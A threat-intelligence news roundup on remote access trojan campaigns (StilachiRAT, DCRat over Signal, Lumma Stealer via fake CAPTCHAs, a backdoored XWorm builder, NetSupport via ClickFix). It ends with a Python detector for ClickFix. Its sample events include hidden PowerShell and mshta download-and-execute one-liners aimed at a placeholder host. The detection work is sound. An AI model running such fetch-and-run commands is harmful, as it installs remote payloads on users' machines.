Microsoft Incident@Microsoft Security Blog
// 19d
Microsoft's Incident Response team has uncovered a novel remote access trojan (RAT) named StilachiRAT, which employs sophisticated techniques to evade detection and steal sensitive data. Discovered in November 2024, StilachiRAT demonstrates advanced methods to remain undetected, persist in the targeted environment, and exfiltrate valuable information. The malware is capable of gathering system information, stealing credentials stored in browsers, targeting cryptocurrency wallets, and using command-and-control connectivity for remote execution.
The RAT scans for configuration data of 20 different cryptocurrency wallet extensions for the Google Chrome browser and extracts credentials from the browser, indicating its focus on cryptocurrency theft and credential compromise. It establishes communication with remote command-and-control (C2) servers to execute commands, manipulate registry settings, and clear logs, making it challenging to detect and remove. Microsoft advises users to download software from official sources, use web browsers with SmartScreen support, and enable Safe Links and Safe Attachments for Office 365 to prevent StilachiRAT infections.
do son@securityonline.info
// 17d
Cybercriminals are actively exploiting the Signal messaging application to distribute an information-stealing Remote Access Trojan (RAT), raising serious privacy concerns. According to a recently published report, a cybercriminal group identified as UAC-0200 is behind the campaign, which targets high-value individuals within Ukraine's defense sector. The Computer Emergency Response Team of Ukraine (CERT-UA) has issued warnings about this campaign, which uses the Dark Crystal RAT (aka DCRat) to compromise systems.
The activity involves distributing Signal messages that appear to contain meeting minutes. These messages are sent from compromised accounts to enhance credibility, enticing unsuspecting users to download malicious archive files. The archives contain a decoy PDF and an executable that deploys the DCRat malware, giving attackers remote access and control and letting them steal valuable information and execute arbitrary commands. CERT-UA attributes this activity to UAC-0200, active since summer 2024, and notes that the use of popular messengers increases the attack surface, including through the creation of uncontrolled information exchange channels.
@www.infosecurity-magazine.com
// 14d
Attackers are exploiting user familiarity with CAPTCHAs to distribute the Lumma Stealer RAT (Remote Access Trojan) via malicious PowerShell commands, according to recent findings. The campaigns trick users into running PowerShell commands that ultimately install Lumma Stealer. Attackers direct potential victims to attacker-controlled sites and prompt them to complete a fake verification challenge; instead of a CAPTCHA, the page instructs them to press Windows + R and run a PowerShell command, under the false pretense of running "Windows Defender."
These attacks leverage weaponized CAPTCHAs: upon completing the supposed verification steps, users inadvertently copy and run PowerShell scripts that download and install malware such as Lumma Stealer, which allows the attackers to steal sensitive data like cryptocurrency wallets. The campaign uses fake Cloudflare verification prompts served through infected WordPress sites, which lead users to execute the malicious PowerShell commands that install the Lumma Stealer Trojan, posing a significant threat.
@www.bleepingcomputer.com
// 69d
A sophisticated cyberattack has successfully targeted low-skilled hackers, often referred to as "script kiddies," by using a modified version of the XWorm RAT builder. This fake builder, disguised as a tool for penetration testing, secretly infects users' systems with a backdoor. This allowed the attacker to compromise over 18,000 devices worldwide. The malware was distributed via various channels including file-sharing services, GitHub repositories, Telegram channels, and even YouTube. Once installed, the malicious software exfiltrated sensitive data such as browser credentials, Discord tokens, Telegram data, and system information.
The campaign highlights the risks faced even by those attempting to engage in hacking activities. Threat actors using aliases such as "@shinyenigma" and "@milleniumrat" have taken advantage of the eagerness of these individuals to download and use tools from online tutorials. The infected machines are located in Russia, the United States, India, Ukraine, and Turkey. The malicious tool uses Telegram for its command and control, via bot tokens and Telegram API calls. Security researchers have identified a kill switch to disrupt operations on active devices, though its reach is limited by offline machines and rate-limiting mechanisms.
@www.esentire.com
// 54d
The eSentire Threat Intelligence team has observed a significant surge in the use of the NetSupport Remote Access Trojan (RAT) since January 2025. This increase is linked to attacks utilizing the emerging "ClickFix" initial access vector, a social engineering technique where users are tricked into executing malicious PowerShell commands. This RAT grants attackers full control over compromised systems, enabling them to monitor screens, control input devices like keyboard and mouse, upload and download files, and execute further malicious commands.
This surge includes a malvertising campaign distributing a fake Cisco AnyConnect installer containing the NetSupport RAT. The RAT is a weaponized build of NetSupport Manager, a legitimate IT support tool sold since 1989. If left undetected, NetSupport RAT can lead to advanced threats, including ransomware attacks, compromise of sensitive data, and disruption of business operations. Organizations are recommended to validate their security controls and educate users on common initial access techniques such as ClickFix. eSentire MDR for Network and Endpoint detects NetSupport RAT activity, and the eSentire Threat Response Unit is performing threat hunts for known Indicators of Compromise across customer environments. IP addresses associated with real-world attacks are blocked via the eSentire Global Block List, and additional Indicators of Compromise have been added to the eSentire Threat Intelligence Feed. The eSentire Tactical Threat Response (TTR) team has developed detections for the ClickFix initial access vector in eSentire MDR for Network.
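The ClickFix chain described in both the fake-CAPTCHA item above and this NetSupport item ends with the user pasting a one-liner into the Run dialog, so on the endpoint it shows up as explorer.exe spawning a script interpreter with a download-and-execute command line. As an added example (not code from any of the sources summarized here), the following Python heuristic scans constructed Sysmon-style process-creation events for that shape; the field names, sample command lines and indicator list are assumptions to tune against your own telemetry.

```python
import re
from dataclasses import dataclass

# Interpreters a pasted Run-dialog command typically invokes (assumed list).
INTERPRETERS = ("powershell.exe", "pwsh.exe", "mshta.exe")

# Command-line traits of a fetch-and-run one-liner. Constructed heuristics,
# not an exhaustive signature set.
INDICATORS = {
    "download": re.compile(r"\b(iwr|invoke-webrequest|downloadstring|curl|wget)\b", re.I),
    "exec": re.compile(r"\b(iex|invoke-expression)\b", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "encoded": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}

@dataclass
class Alert:
    command_line: str
    reasons: list

def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()

def evaluate(event: dict):
    """Return an Alert when the event looks like a Run-dialog launched
    download-and-execute, otherwise None."""
    if basename(event["ParentImage"]) != "explorer.exe":   # Win+R parent
        return None
    if basename(event["Image"]) not in INTERPRETERS:
        return None
    cmd = event["CommandLine"]
    reasons = [name for name, pat in INDICATORS.items() if pat.search(cmd)]
    # A plain local script run from explorer is noise; require remote content
    # or an encoded payload before raising.
    if {"download", "encoded", "remote_url"} & set(reasons):
        return Alert(cmd, reasons)
    return None

def scan(events):
    return [a for a in (evaluate(e) for e in events) if a]

# Constructed sample events: one ClickFix-style PowerShell run, one benign
# admin script, one cmd.exe-spawned shell (out of scope), one mshta fetch.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": 'powershell -w hidden -c "iwr http://example.invalid/a | iex"'},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": PS,
     "CommandLine": r"powershell -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe", "Image": PS,
     "CommandLine": "powershell -c Get-Process"},
    {"ParentImage": r"C:\Windows\explorer.exe", "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta http://example.invalid/v.hta"},
]
```

Pair the process-tree check with a review of the user's RunMRU history when an alert fires, since the pasted command is recorded there as well.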